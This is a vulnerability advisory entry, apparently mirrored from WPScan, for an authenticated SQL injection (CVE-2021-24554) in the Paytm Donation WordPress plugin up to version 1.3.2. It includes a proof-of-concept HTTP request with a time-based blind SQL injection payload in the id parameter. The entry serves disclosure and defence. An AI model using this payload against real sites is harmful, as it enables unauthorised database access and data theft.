Lucene search
WpvulndbWPVDB-ID:F2842AC8-76FA-4490-AA0C-5F2B07ECF2ADHistoryJul 24, 2021 - 12:00 a.m.
Paytm - Donation Plugin <= 1.3.2 - Authenticated (admin+) SQL Injection
2021-07-2400:00:00
wpscan.com
8
0.291 Low
EPSS
Percentile
96.9%
The plugin does not sanitise, validate or escape the id GET parameter before using it in a SQL statement when deleting donations, leading to an authenticated SQL injection issue
PoC
GET /wp-admin/admin.php?page=wp_paytm_donation&action;=delete&id;=1%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(5)))Pjwy) HTTP/1.1 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 Cookie: [admin+] Connection: close
| CPE | Name | Operator | Version |
|---|---|---|---|
| wp-paytm-pay | eq | * |
Related
prion
prion
Sql injection
2021-08-23 12:15:00
nuclei
nuclei
WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection
2023-03-05 13:42:10
wpexploit
wpexploit
Paytm - Donation Plugin <= 1.3.2 - Authenticated (admin+) SQL Injection
2021-07-24 00:00:00
cve
cve
CVE-2021-24554
2021-08-23 12:15:09
patchstack
patchstack
cvelist
cvelist
nvd
nvd
CVE-2021-24554
2021-08-23 12:15:09